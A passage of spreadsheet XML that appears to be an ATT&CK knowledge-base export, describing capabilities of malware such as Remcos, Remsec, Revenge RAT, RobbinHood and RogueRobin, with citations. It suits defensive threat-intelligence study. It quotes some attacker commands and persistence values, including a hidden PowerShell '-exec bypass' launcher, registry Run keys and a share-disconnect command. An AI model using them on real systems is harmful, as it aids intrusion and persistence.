    <t>[RegDuke](https://attack.mitre.org/software/S0511) can use control-flow flattening or the commercially available .NET Reactor for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can extract and execute PowerShell scripts from C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can hide data in images, including use of the Least Significant Bit (LSB).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) leveraged several compromised universities as proxies to obscure its origin.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) has used a hidden file system to store some of its components.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) contains a keylogger.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to modify remote Registry information.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform uses Extended Attributes to store encrypted executables.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use ICMP to communicate between infected computers.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform can use Windows admin shares to move laterally.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>The [Regin](https://attack.mitre.org/software/S0019) malware platform supports many standard protocols, including HTTP and HTTPS.(Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can capture data from the system’s microphone.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for UAC bypassing.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) steals and modifies data from the clipboard.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can search for files on the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can upload and download files to and from the victim’s machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command for keylogging.(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has full control of the Registry, including the ability to modify it.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses RC4 and base64 to obfuscate data, including Registry entries and file paths.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) has a command to hide itself through injecting into another process.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses the infected hosts as SOCKS5 proxies to allow for tunneling and proxying.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can add itself to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) takes automated screenshots of the infected machine.(Citation: Riskiq Remcos Jan 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) searches for Sandboxie and VMware on the system.(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can access a system’s webcam and take pictures.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) can launch a remote command line to execute commands on the victim’s machine.(Citation: Fortinet Remcos Feb 2017)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) has a command to capture active windows on the machine and retrieve window titles.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) encrypts and adds all gathered browser data into files for upload to C2.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) collects text from the clipboard.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) decrypts the configuration data using XOR with 25-character keys.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) performs exfiltration over [BITSAdmin](https://attack.mitre.org/software/S0190), which is also used for the C2 channel.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) searches for files on the system. (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) gathers and exfiltrates keystrokes from the machine.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) obfuscates its configuration data with XOR.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes Run Registry keys in the HKLM hive as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) utilizes scheduled tasks as a persistence mechanism.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) takes screenshots of windows of interest.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses AutoIt and VBS scripts throughout its execution process.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) uses [BITSAdmin](https://attack.mitre.org/software/S0190) to communicate with the C2 server over HTTP.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) silently executes received commands with cmd.exe.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) executes received commands with wmic.exe (for WMI commands). (Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) achieves persistence using Userinit by adding the Registry key &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit&lt;/code&gt;.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) copies a file over to the remote system before execution.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new schedule task on the remote system(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) can execute commands remotely by creating a new service on the remote system.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can enumerate files and directories on a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can upload and download files to and from a target machine.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can use Msiexec to install a service.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) can take screenshots on a compromised host.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using DNS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a package that collects documents from any inserted USB sticks.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can add or remove applications or ports on the Windows firewall or disable it entirely.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can perform DLL injection.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of deleting files on the victim. It also securely removes itself after collecting and exfiltrating data.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of listing contents of folders on the victim. [Remsec](https://attack.mitre.org/software/S0125) also searches for custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) contains a keylogger component.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of users.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using SMTP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>The [Remsec](https://attack.mitre.org/software/S0125) loader implements itself with the name Security Support Provider, a legitimate Windows function. Various [Remsec](https://attack.mitre.org/software/S0125) .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. [Remsec](https://attack.mitre.org/software/S0125) also disguised malicious modules using similar filenames as custom network encryption software on victims.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin that can perform ARP scanning as well as port scanning.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using ICMP, TCP, and UDP for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>Some data in [Remsec](https://attack.mitre.org/software/S0125) is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) harvests plain-text credentials as a password filter registered on domain controllers.(Citation: Kaspersky ProjectSauron Full Report)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a process list from the victim.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can ping or traceroute a remote host.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) schedules the execution one of its modules by creating a new scheduler task.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can dump the SAM database.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) has a plugin to detect active drivers of some security products.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain a list of active connections and open ports.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) can obtain information about the current user.(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is capable of using HTTP and HTTPS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) is used to poison name services to gather hashes and credentials from systems within a local network.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Responder](https://attack.mitre.org/software/S0174) captures hashes and credentials that are sent to the system after the name services have been poisoned.(Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for microphone interception.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) used blogpost.com as its primary command and control server during a campaign.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the [Forfiles](https://attack.mitre.org/software/S0193) utility to execute commands on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to upload and download files.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for keylogging.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses mshta.exe to run malicious scripts on the system.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for credential harvesting.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses the PowerShell command &lt;code&gt;Reflection.Assembly&lt;/code&gt; to load itself into memory to aid in execution.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) creates a Registry key at &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell&lt;/code&gt; to survive a system reboot.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin to perform RDP access.(Citation: Cylance Shaheen Nov 2018)
</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) schedules tasks to run malicious scripts at different intervals.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has a plugin for screen capture.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses Base64 to encode information sent to the C2 server.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the CPU information, OS information, and system language.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) collects the IP address and MAC address from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) gathers the username from the system.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) has the ability to access the webcam.(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) uses cmd.exe to execute commands and run scripts on the victim's machine.(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as &lt;code&gt;C:\ProgramData\Initech\Initech.exe&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been executed from malicious Excel or Word documents containing macros.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted strings with a single byte XOR algorithm.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has created a new registry entry at &lt;code&gt;HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics&lt;/code&gt; with a value of &lt;code&gt;C:\ProgramData\Initech\Initech.exe /run&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has been distributed in e-mails with malicious Excel or Word documents.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the Windows version on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the IP address of the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) has the ability to identify the username on the compromised host.(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can archive data using RC4 encryption and Base64 encoding prior to exfiltration.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) variants can use SSL for encrypting C2 communications.(Citation: Bleeping Computer Op Sharpshooter March 2019)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has collected data and files from a compromised host.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) has decrypted itself using a single-byte XOR scheme. Additionally, [Rising Sun](https://attack.mitre.org/software/S0448) can decrypt its configuration data at runtime.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can send data gathered from the infected machine via HTTP POST request to the C2.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can delete files and artifacts it creates.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate information about files from the infected system, including file size, attributes, creation time, last access time, and write time. [Rising Sun](https://attack.mitre.org/software/S0448) can enumerate the compilation timestamp of Windows executable files.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can modify file attributes to hide files.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can clear a memory blog in the process by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) can test a connection to a specified network IP address over a specified port number.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Configuration data used by [Rising Sun](https://attack.mitre.org/software/S0448) has been encrypted using an RC4 stream algorithm.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can enumerate all running processes and process information on an infected machine.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has identified the OS product name from a compromised host by searching the registry for `SOFTWARE\MICROSOFT\Windows NT\ CurrentVersion | ProductName`.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can detect network adapter and IP address information.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) can detect the username of the infected host.(Citation: McAfee Sharpshooter December 2018)	</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) has used HTTP and HTTPS for command and control.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Rising Sun](https://attack.mitre.org/software/S0448) has executed commands using `cmd.exe /c “&lt;command&gt; &gt; &lt;%temp%&gt;\AM&lt;random&gt;. tmp” 2&gt;&amp;1`.(Citation: McAfee Sharpshooter December 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for an RSA encryption key and then perform its encryption process on the system files.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) will search for Windows services that are associated with antivirus software on the system and kill the process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) deletes shadow copies to ensure that all the data cannot be restored easily.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) disconnects all network shares from the computer with the command &lt;code&gt;net use * /DELETE /Y&lt;/code&gt;.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[RobbinHood](https://attack.mitre.org/software/S0400) stops 181 Windows services on the system before beginning the encryption process.(Citation: CarbonBlack RobbinHood May 2019) </t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) uses cmd.exe on the victim's computer.(Citation: CarbonBlack RobbinHood May 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has used Google Drive as a Command and Control channel. (Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) decodes an embedded executable using base64 and decompresses it.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) can save a new file to the system from the C2 server.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>The PowerShell script with the [RogueRobin](https://attack.mitre.org/software/S0270) payload was obfuscated using the COMPRESS technique in Invoke-Obfuscation.(Citation: Unit 42 DarkHydrus July 2018)(Citation: GitHub Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses a command prompt to run a PowerShell script from Excel.(Citation: Unit 42 DarkHydrus July 2018) To assist in establishing persistence, [RogueRobin](https://attack.mitre.org/software/S0270) creates &lt;code&gt;%APPDATA%\OneDrive.bat&lt;/code&gt; and saves the following string to it:&lt;code&gt;powershell.exe -WindowStyle Hidden -exec bypass -File “%APPDATA%\OneDrive.ps1”&lt;/code&gt;.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses regsvr32.exe to run a .sct file for execution.(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) has a command named &lt;code&gt;$screenshot&lt;/code&gt; that may be responsible for taking screenshots of the victim machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) enumerates running processes to search for Wireshark and Windows Sysinternals suite.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) establishes persistence by creating a shortcut (.LNK file) in the Windows startup folder to run a script each time the user logs in.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) base64 encodes strings that are sent to the C2 over its DNS tunnel.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses WMI to check BIOS version for VBOX, bochs, qemu, virtualbox, and vm to check for evidence that the script might be executing within an analysis environment. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers BIOS versions and manufacturers, the number of CPU cores, the total physical memory, and the computer name.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) gathers the IP address and domain from the victim’s machine.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) collects the victim’s username and whether that user is an admin.(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses Windows Script Components.(Citation: Unit42 DarkHydrus Jan 2019)(Citation: Unit 42 DarkHydrus July 2018)</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) uses various WMI queries to check if the sample is running in a sandbox.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. [Rover](https://attack.mitre.org/software/S0090) also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.(Citation: Palo Alto Rover)</t>
  </si>
  <si>
